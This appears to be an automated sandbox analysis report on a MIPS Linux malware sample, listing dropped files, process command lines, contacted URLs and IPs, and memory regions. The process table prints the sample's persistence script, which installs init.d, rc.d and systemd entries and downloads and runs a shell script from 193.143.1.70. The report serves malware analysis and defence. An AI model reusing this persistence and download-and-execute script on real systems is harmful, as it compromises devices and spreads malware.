Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
mipsel.nn.elf
|
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/mipsel.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.wBeTqY (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/mipsel.nn.elf
|
/tmp/mipsel.nn.elf
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n
/tmp/mipsel.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n
*)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mipsel.nn.elf
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/tmp/mipsel.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
71.170.125.212
|
unknown
|
United States
|
||
|
195.36.27.107
|
unknown
|
Italy
|
||
|
80.77.3.181
|
unknown
|
United Kingdom
|
||
|
173.125.90.235
|
unknown
|
United States
|
||
|
77.186.27.128
|
unknown
|
Germany
|
||
|
50.225.232.198
|
unknown
|
United States
|
||
|
86.75.3.155
|
unknown
|
France
|
||
|
96.44.232.52
|
unknown
|
Canada
|
||
|
171.180.89.91
|
unknown
|
United States
|
||
|
171.52.209.61
|
unknown
|
India
|
||
|
190.156.91.157
|
unknown
|
Colombia
|
||
|
158.249.52.25
|
unknown
|
Hungary
|
||
|
207.105.12.31
|
unknown
|
United States
|
||
|
200.133.32.22
|
unknown
|
Brazil
|
||
|
46.215.221.242
|
unknown
|
Poland
|
||
|
158.194.112.170
|
unknown
|
Czech Republic
|
||
|
138.39.17.157
|
unknown
|
United States
|
||
|
132.202.100.180
|
unknown
|
Canada
|
||
|
192.37.163.178
|
unknown
|
Switzerland
|
||
|
131.60.101.52
|
unknown
|
United States
|
||
|
59.248.153.124
|
unknown
|
China
|
||
|
16.73.22.161
|
unknown
|
United States
|
||
|
139.8.67.219
|
unknown
|
Germany
|
||
|
39.78.72.122
|
unknown
|
China
|
||
|
129.114.1.16
|
unknown
|
United States
|
||
|
167.185.88.34
|
unknown
|
United States
|
||
|
76.43.142.13
|
unknown
|
United States
|
||
|
164.51.253.254
|
unknown
|
United States
|
||
|
120.235.242.180
|
unknown
|
China
|
||
|
97.115.102.110
|
unknown
|
United States
|
||
|
185.188.121.235
|
unknown
|
Germany
|
||
|
148.98.5.43
|
unknown
|
United States
|
||
|
11.217.195.48
|
unknown
|
United States
|
||
|
89.39.59.65
|
unknown
|
Spain
|
||
|
183.37.182.252
|
unknown
|
China
|
||
|
188.65.5.8
|
unknown
|
Italy
|
||
|
108.252.101.191
|
unknown
|
United States
|
||
|
56.0.116.223
|
unknown
|
United States
|
||
|
199.17.89.139
|
unknown
|
United States
|
||
|
140.106.144.13
|
unknown
|
United States
|
||
|
96.84.167.35
|
unknown
|
United States
|
||
|
130.53.49.210
|
unknown
|
United States
|
||
|
182.7.19.170
|
unknown
|
Indonesia
|
||
|
126.225.187.220
|
unknown
|
Japan
|
||
|
99.157.127.65
|
unknown
|
United States
|
||
|
204.158.66.105
|
unknown
|
United States
|
||
|
53.164.148.158
|
unknown
|
Germany
|
||
|
58.78.106.125
|
unknown
|
Korea Republic of
|
||
|
86.84.183.98
|
unknown
|
Netherlands
|
||
|
14.45.182.230
|
unknown
|
Korea Republic of
|
||
|
115.35.181.58
|
unknown
|
China
|
||
|
200.56.140.193
|
unknown
|
Mexico
|
||
|
204.93.3.158
|
unknown
|
United States
|
||
|
203.148.93.32
|
unknown
|
Australia
|
||
|
176.84.188.39
|
unknown
|
Spain
|
||
|
90.176.248.93
|
unknown
|
Czech Republic
|
||
|
55.126.74.127
|
unknown
|
United States
|
||
|
206.95.8.219
|
unknown
|
United States
|
||
|
119.87.176.238
|
unknown
|
China
|
||
|
139.159.22.101
|
unknown
|
China
|
||
|
52.178.243.172
|
unknown
|
United States
|
||
|
213.148.118.134
|
unknown
|
Germany
|
||
|
178.218.134.98
|
unknown
|
Romania
|
||
|
119.39.75.203
|
unknown
|
China
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
152.198.142.143
|
unknown
|
United States
|
||
|
152.35.73.195
|
unknown
|
United States
|
||
|
207.55.93.224
|
unknown
|
United States
|
||
|
204.229.246.34
|
unknown
|
United States
|
||
|
190.73.110.19
|
unknown
|
Venezuela
|
||
|
91.236.252.248
|
unknown
|
Russian Federation
|
||
|
168.70.16.110
|
unknown
|
Hong Kong
|
||
|
17.199.254.245
|
unknown
|
United States
|
||
|
47.177.131.10
|
unknown
|
United States
|
||
|
85.40.151.151
|
unknown
|
Italy
|
||
|
182.188.125.29
|
unknown
|
Pakistan
|
||
|
35.251.46.81
|
unknown
|
United States
|
||
|
199.68.111.184
|
unknown
|
United States
|
||
|
194.87.116.166
|
unknown
|
Russian Federation
|
||
|
208.255.109.248
|
unknown
|
United States
|
||
|
59.220.215.52
|
unknown
|
China
|
||
|
108.243.241.193
|
unknown
|
United States
|
||
|
125.172.219.246
|
unknown
|
Japan
|
||
|
86.180.214.70
|
unknown
|
United Kingdom
|
||
|
189.237.218.69
|
unknown
|
Mexico
|
||
|
208.210.124.45
|
unknown
|
United States
|
||
|
193.69.222.239
|
unknown
|
Norway
|
||
|
158.87.129.6
|
unknown
|
United States
|
||
|
170.20.52.10
|
unknown
|
United States
|
||
|
64.78.99.51
|
unknown
|
United States
|
||
|
200.185.162.44
|
unknown
|
Brazil
|
||
|
135.54.76.31
|
unknown
|
United States
|
||
|
197.165.148.249
|
unknown
|
Egypt
|
||
|
192.40.106.49
|
unknown
|
United States
|
||
|
122.240.106.88
|
unknown
|
China
|
||
|
212.154.24.172
|
unknown
|
Turkey
|
||
|
185.53.101.85
|
unknown
|
Albania
|
||
|
9.204.135.86
|
unknown
|
United States
|
||
|
177.171.82.206
|
unknown
|
Brazil
|
||
|
49.83.24.218
|
unknown
|
China
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f3c88423000
|
page execute read
|
|
||
|
7f3c88423000
|
page execute read
|
|
||
|
7f3d08000000
|
page read and write
|
|||
|
55a031c2c000
|
page read and write
|
|||
|
7f3c88468000
|
page read and write
|
|||
|
7fffdcb81000
|
page execute read
|
|||
|
7fffdcb4d000
|
page read and write
|
|||
|
55a02fc17000
|
page read and write
|
|||
|
55a02fc17000
|
page read and write
|
|||
|
7f3d08021000
|
page read and write
|
|||
|
7f3d0e894000
|
page read and write
|
|||
|
55a02fc0d000
|
page read and write
|
|||
|
7f3d0e8d4000
|
page read and write
|
|||
|
7f3d0ef17000
|
page read and write
|
|||
|
7f3d0e243000
|
page read and write
|
|||
|
55a02fc0d000
|
page read and write
|
|||
|
7f3d0ef5c000
|
page read and write
|
|||
|
7fffdcb81000
|
page execute read
|
|||
|
7f3d0ede6000
|
page read and write
|
|||
|
55a032fcb000
|
page read and write
|
|||
|
7f3d0ec05000
|
page read and write
|
|||
|
7f3d0ef17000
|
page read and write
|
|||
|
7f3d0e4f3000
|
page read and write
|
|||
|
7f3d0ef0f000
|
page read and write
|
|||
|
7f3d08000000
|
page read and write
|
|||
|
7f3d0e4f3000
|
page read and write
|
|||
|
55a032fcb000
|
page read and write
|
|||
|
7f3d0ef0f000
|
page read and write
|
|||
|
7f3d0e894000
|
page read and write
|
|||
|
7fffdcb4d000
|
page read and write
|
|||
|
7f3d0da2d000
|
page read and write
|
|||
|
55a02f985000
|
page execute read
|
|||
|
7f3d08021000
|
page read and write
|
|||
|
7f3d0ede6000
|
page read and write
|
|||
|
55a02f985000
|
page execute read
|
|||
|
7f3c88464000
|
page read and write
|
|||
|
7f3d0ef5c000
|
page read and write
|
|||
|
7f3d0da2d000
|
page read and write
|
|||
|
7f3d0e8d4000
|
page read and write
|
|||
|
55a031c2c000
|
page read and write
|
|||
|
7f3d0e235000
|
page read and write
|
|||
|
7f3c88468000
|
page read and write
|
|||
|
7f3c8846d000
|
page read and write
|
|||
|
7f3d0ec05000
|
page read and write
|
|||
|
55a031c15000
|
page execute and read and write
|
|||
|
7f3d0e8b7000
|
page read and write
|
|||
|
7f3d0e8b7000
|
page read and write
|
|||
|
55a031c15000
|
page execute and read and write
|
|||
|
7f3c88464000
|
page read and write
|
|||
|
7f3d0e243000
|
page read and write
|
|||
|
7f3d0e235000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.